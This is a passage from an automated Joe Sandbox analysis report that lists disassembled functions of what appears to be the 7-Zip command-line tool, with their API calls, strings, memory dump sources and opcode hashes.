                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 830578293d49dbd6d1dbec8571fb5db1cc2f66fa769941972cc298bfa350000c
                              • Instruction ID: 6cf19e6f6533ebc3bc60d8a260f40b920334094d4cb5e5fd58d1a23868e24968
                              • Opcode Fuzzy Hash: 830578293d49dbd6d1dbec8571fb5db1cc2f66fa769941972cc298bfa350000c
                              • Instruction Fuzzy Hash: 7571D27372468096CB50EB16E9405AEB3A1F384BA4F508512FF9E47B69DF38D890DF50
                              Function 00F9F580 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 202stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: strcmp
                              • String ID: =
                              • API String ID: 1004003707-2525689732
                              • Opcode ID: 0e249ffe8aca5e057bec8785a432b27c2d1d9d2ddb026999ed26aaef8aeed705
                              • Instruction ID: d5256fb2125dcf6577e70039237a9a5c495b7eca19110106b2a58f5e87ab1bd5
                              • Opcode Fuzzy Hash: 0e249ffe8aca5e057bec8785a432b27c2d1d9d2ddb026999ed26aaef8aeed705
                              • Instruction Fuzzy Hash: CA61E82360968085DB21DF1AE89155FBB61F7D5BE0F48A132FA8F47729DA3CC44ADB01
                              Function 00F89D20 Relevance: 7.7, APIs: 6, Instructions: 189COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 43209498332682a02e7ce7fc75598344194703a03d02bd2ff963372942ffa5f8
                              • Instruction ID: c49d30ffc6ce892f24dcfee130da852b985286025e57246d1c7cddaa5e70982f
                              • Opcode Fuzzy Hash: 43209498332682a02e7ce7fc75598344194703a03d02bd2ff963372942ffa5f8
                              • Instruction Fuzzy Hash: 03811873704AC585CB54EF2AD8942AD77A2F385F98F084522DE5A0B729CF78C886D321
                              Function 00FAD19C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 172COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID: Q
                              • API String ID: 0-3463352047
                              • Opcode ID: a94d61e150a1754dd26c745f5cd4609018c7a69d061acf13115967c71d75198d
                              • Instruction ID: 38a7f9f0fc9cb6baa17d23db3acf742b374a6737b63ac45ab794e05f8f9a557d
                              • Opcode Fuzzy Hash: a94d61e150a1754dd26c745f5cd4609018c7a69d061acf13115967c71d75198d
                              • Instruction Fuzzy Hash: 736192B2614B8582CB20DF16E48066EB361F7CABA4F549112EB9B57B58DF3CC845EB01
                              Function 00FB2C2C Relevance: 7.6, APIs: 6, Instructions: 134COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: e44fc19b267962cb49ac49d0083388fbb7342cda1abcabb3608d1017c9908560
                              • Instruction ID: 9d57e3528cc9afac826c2f7af7ff73bcaf98507fbb06a54205cdc47d48366b54
                              • Opcode Fuzzy Hash: e44fc19b267962cb49ac49d0083388fbb7342cda1abcabb3608d1017c9908560
                              • Instruction Fuzzy Hash: 2841D7232082C0D9CB61DF2AE84019FBFF4E3967A0B544215FB9A17B69CA3DC151EB11
                              Function 00F7CA40 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: act:$ cpus:$ gran:$ page:
                              • API String ID: 1294909896-454015223
                              • Opcode ID: cd77afef6a19f1e87174f2b9aa2f83a1400f9bbebe3f7a725566f3c63b0bae6c
                              • Instruction ID: 59af042ab5517765b8a8012e1abf1b6edcca0a169e88d6d45ffdd9e96e33ede0
                              • Opcode Fuzzy Hash: cd77afef6a19f1e87174f2b9aa2f83a1400f9bbebe3f7a725566f3c63b0bae6c
                              • Instruction Fuzzy Hash: 0241CC62340602A2DA24EF25ED517A87362E789BE0F48D137EE0E07B58DF3CC165E342
                              Function 00F8443C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 118COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00F844C5
                              • _CxxThrowException.MSVCRT ref: 00F845B9
                                • Part of subcall function 00F840EC: _CxxThrowException.MSVCRT ref: 00F841CC
                              • _CxxThrowException.MSVCRT ref: 00F845EE
                              Strings
                              • Empty file path, xrefs: 00F8459C
                              • There is no second file name for rename pair:, xrefs: 00F845D1
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow$free
                              • String ID: Empty file path$There is no second file name for rename pair:
                              • API String ID: 3129652135-1725603831
                              • Opcode ID: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
                              • Instruction ID: 2e165c44f9ba20df99d67bf71608e8b9c4fced7492a388fcc8394ebe990497db
                              • Opcode Fuzzy Hash: 8022aaaa88cdb27e1cfc2db7b1f6733e86bc3584a93fb28a2e88449b6e4d6991
                              • Instruction Fuzzy Hash: 9B41E6632056C285DA20EB15E8407EE7720F396BF4F448712EEBA0B7D4DB78D486D741
                              Function 00FBE1C0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: #
                              • API String ID: 1294909896-1885708031
                              • Opcode ID: 38055dc1e7462e097eae52bffdd7dad44dd24194a95989077b927179d5e71d61
                              • Instruction ID: 52b855949fcbf65532f35508dc6a293f625b82e2559b6e0f60e51a1f6b52b9e4
                              • Opcode Fuzzy Hash: 38055dc1e7462e097eae52bffdd7dad44dd24194a95989077b927179d5e71d61
                              • Instruction Fuzzy Hash: 4F31A223A04A9491CB60DA16D8402DEA764F785BF0F584122FF9F5B764CE38CD85EB01
                              Function 00F74304 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                              • String ID:
                              • API String ID: 2296236218-0
                              • Opcode ID: 52e4726711ec5748391007b40f94998213c969474937b66d9cbfd54a84faa804
                              • Instruction ID: 633df6e749000c2da90a2e6ec83c6b5a009169db18a7336638f2b8b166ba74dd
                              • Opcode Fuzzy Hash: 52e4726711ec5748391007b40f94998213c969474937b66d9cbfd54a84faa804
                              • Instruction Fuzzy Hash: 24310633704BC686CB70CF25E48436EBBA5F784B94F558126DA8D63B24DB38C886E701
                              Function 00F987C4 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorFileLastSecurity$free
                              • String ID:
                              • API String ID: 3917221116-0
                              • Opcode ID: e78660661bdf9185f7c16a80bfbec8f383812a105daf54fdc555c8761ac86240
                              • Instruction ID: 334a69aa51439b659285bc8ce1bd715daa4151a2291a93060df4cbdaa62a5d79
                              • Opcode Fuzzy Hash: e78660661bdf9185f7c16a80bfbec8f383812a105daf54fdc555c8761ac86240
                              • Instruction Fuzzy Hash: 0D319933B017819AEB508F25E8043AE73A1F786F98F584136DE8A5B754DF38C846E711
                              Function 00F88148 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$wcscmp
                              • String ID:
                              • API String ID: 4021281200-0
                              • Opcode ID: 22d44a6049aa5533ca4e073c02e8b0dae08f906ceeccbcac1509b0922c34b677
                              • Instruction ID: 4be0a5e213e0eb5536207c5514e59bfb1b0ae1f3ae018289ec1c7d7eac90a15c
                              • Opcode Fuzzy Hash: 22d44a6049aa5533ca4e073c02e8b0dae08f906ceeccbcac1509b0922c34b677
                              • Instruction Fuzzy Hash: FC31BE72714B4186D760EF12E88436AB760F784BE4F548226EF9A47B98DF7CC846E700
                              Function 00F76EA4 Relevance: 7.6, APIs: 5, Instructions: 74filetimeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: File$Create$CloseHandleTimefree
                              • String ID:
                              • API String ID: 234454789-0
                              • Opcode ID: c728b8dd31556345467ffe1da12aa57c87299959c4f069fc15c4c46e01533b6a
                              • Instruction ID: 2c7a5234520bb0c8b610b60829916875736decaebb96ba163150cb618323b012
                              • Opcode Fuzzy Hash: c728b8dd31556345467ffe1da12aa57c87299959c4f069fc15c4c46e01533b6a
                              • Instruction Fuzzy Hash: D321D43220064146D6209F25FE54BAE7621B386BF8F548322EE7943BD8DF38C986E701
                              Function 00F77564 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentDirectoryW.KERNEL32 ref: 00F7759A
                              • GetCurrentDirectoryW.KERNEL32 ref: 00F775F4
                              • free.MSVCRT ref: 00F77606
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CurrentDirectoryfree$memmove
                              • String ID:
                              • API String ID: 4010226229-0
                              • Opcode ID: c19f74369a6a2d3a7f47946ee4549c86ac383be35a87fa9ab5d3c140d7243ea0
                              • Instruction ID: 74a7dc4b758d164bf4663abf5e2a8379d2eb475c21e31ed53334ff4513085385
                              • Opcode Fuzzy Hash: c19f74369a6a2d3a7f47946ee4549c86ac383be35a87fa9ab5d3c140d7243ea0
                              • Instruction Fuzzy Hash: 5121DB2262C74492CB70AF24E88476E6371F784754F50D213EA9E877A8DF3DC645EB12
                              Function 00F8978C Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: b8ec584b560308700cc719fe69e1a7bb64ec45b8d30b4df46fd101b6897b48f8
                              • Instruction ID: ad095f5e1d8f5301f6f6dedc83be7b32b770ff5a6b08d331be091a89b405d3c5
                              • Opcode Fuzzy Hash: b8ec584b560308700cc719fe69e1a7bb64ec45b8d30b4df46fd101b6897b48f8
                              • Instruction Fuzzy Hash: 2F116AA231875291FB24AF269D417F833269B16FD4FCC50269E094B649FFA8CA55E304
                              Function 00F7E960 Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: 78dc16436171f411aa0328f5a3ed5716f1326067f0e8e8d7e17c230dbfd3e929
                              • Instruction ID: 3a477a1cd7f415cd636c99caa81856a3b6ada7b5d10c19963576ce68fce31a19
                              • Opcode Fuzzy Hash: 78dc16436171f411aa0328f5a3ed5716f1326067f0e8e8d7e17c230dbfd3e929
                              • Instruction Fuzzy Hash: 9611C0A330574281FA249B229D417B833266759FD4F888067CE095A608FF6CCA55F305
                              Function 00FAAD88 Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: memcmp
                              • String ID:
                              • API String ID: 1475443563-0
                              • Opcode ID: 268113d5be270a562f7383196f03c6f9e924eee01447992a60fd605f9f4079f5
                              • Instruction ID: 96b17a4bc02f1cc71180b083065f58bb552a2424f7be875dff15e3b728eb3ee3
                              • Opcode Fuzzy Hash: 268113d5be270a562f7383196f03c6f9e924eee01447992a60fd605f9f4079f5
                              • Instruction Fuzzy Hash: 9411A2E234578241EB24DF27DD817B833265B1AFD4F885426CE094B609EF78C65AF305
                              Function 00F8E588 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 62COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00F8E621
                                • Part of subcall function 00F8E1DC: memset.MSVCRT ref: 00F8E1FF
                                • Part of subcall function 00F8E1DC: strlen.MSVCRT ref: 00F8E21E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: freememsetstrlen
                              • String ID: ?$ MB$, # $RAM
                              • API String ID: 2062123303-3586855483
                              • Opcode ID: a31aee8ee038967564c260756f0c0934e99b2ade99b10984ad30e53087e54350
                              • Instruction ID: f70098c0aad5351a0e8d37af314187e762cfe46e5b6ca136841ba8a042b19461
                              • Opcode Fuzzy Hash: a31aee8ee038967564c260756f0c0934e99b2ade99b10984ad30e53087e54350
                              • Instruction Fuzzy Hash: 5D115C77304A0596DA30EF26E85436D7321A78AFE8F458222DF9E47B64DF2DC606D701
                              Function 00FA6F74 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F7C684: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,00FA6FAE), ref: 00F7C6AF
                                • Part of subcall function 00F7C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C5EA
                                • Part of subcall function 00F7C59C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00F7C638
                              • free.MSVCRT ref: 00FA7027
                                • Part of subcall function 00F73798: free.MSVCRT ref: 00F737C4
                                • Part of subcall function 00F73798: memmove.MSVCRT ref: 00F737DF
                                • Part of subcall function 00F79164: free.MSVCRT ref: 00F791EC
                              • free.MSVCRT ref: 00FA700F
                              • free.MSVCRT ref: 00FA701A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$QueryValue$Openmemmove
                              • String ID: 7z.dll$Software\7-zip
                              • API String ID: 2771487249-1558686312
                              • Opcode ID: b3266d8cb8d56b5d9a87b488a01587aa72cdf24287fc1b58982ca6b4790d8148
                              • Instruction ID: 2a2425c0f94314804944954d41c82a97e2784de282c268e9370fbc9e7cdb227c
                              • Opcode Fuzzy Hash: b3266d8cb8d56b5d9a87b488a01587aa72cdf24287fc1b58982ca6b4790d8148
                              • Instruction Fuzzy Hash: 9511EC5230464450CA60F721EC513AE7721EBD6BF0F849223ED9D477A5DF2CC64AEB01
                              Function 00FC1A98 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free
                              • String ID:
                              • API String ID: 3873070119-0
                              • Opcode ID: b7cdbe10e4c6bcb1dc32dd60855dee87dce0fc9921db1c144bde060f0a37d5a3
                              • Instruction ID: cca953c53098cb85cc767bf681c1c06571e028942614cd5099e0e6de09c5d4c1
                              • Opcode Fuzzy Hash: b7cdbe10e4c6bcb1dc32dd60855dee87dce0fc9921db1c144bde060f0a37d5a3
                              • Instruction Fuzzy Hash: DF115E22200A4593DB60EB2AE94076E7321F7C5BA4F408222EB9E43BA5DF2CC959D300
                              Function 00F773B0 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CreateDirectoryfree$ErrorLast
                              • String ID:
                              • API String ID: 3252411863-0
                              • Opcode ID: d3a5d44a16c63213326289f5f19480a8151ed31848b30160420883b42acee868
                              • Instruction ID: ac7cc0961607e44ff1f92ef42de9866875c298e30c550d29c9ac56aa14768b61
                              • Opcode Fuzzy Hash: d3a5d44a16c63213326289f5f19480a8151ed31848b30160420883b42acee868
                              • Instruction Fuzzy Hash: FC01D82221870281D670EB32988433D1325ABC57B4F48C223DD5D876A4DF1CC946F713
                              Function 00FAEF24 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                              • Instruction ID: 482a7761764bf4e3857394a85fec31193a8544bce58ffc352454ba8a0e314c46
                              • Opcode Fuzzy Hash: 57756d85c65f05cda8d1a774ccd206aecd44e4c111d0521ad48d3dc7cc5f1731
                              • Instruction Fuzzy Hash: 7BF03A1374660A42CB86F736E86127E6310EBC7F91F84A4229E0E1B311DE3DC5A7A615
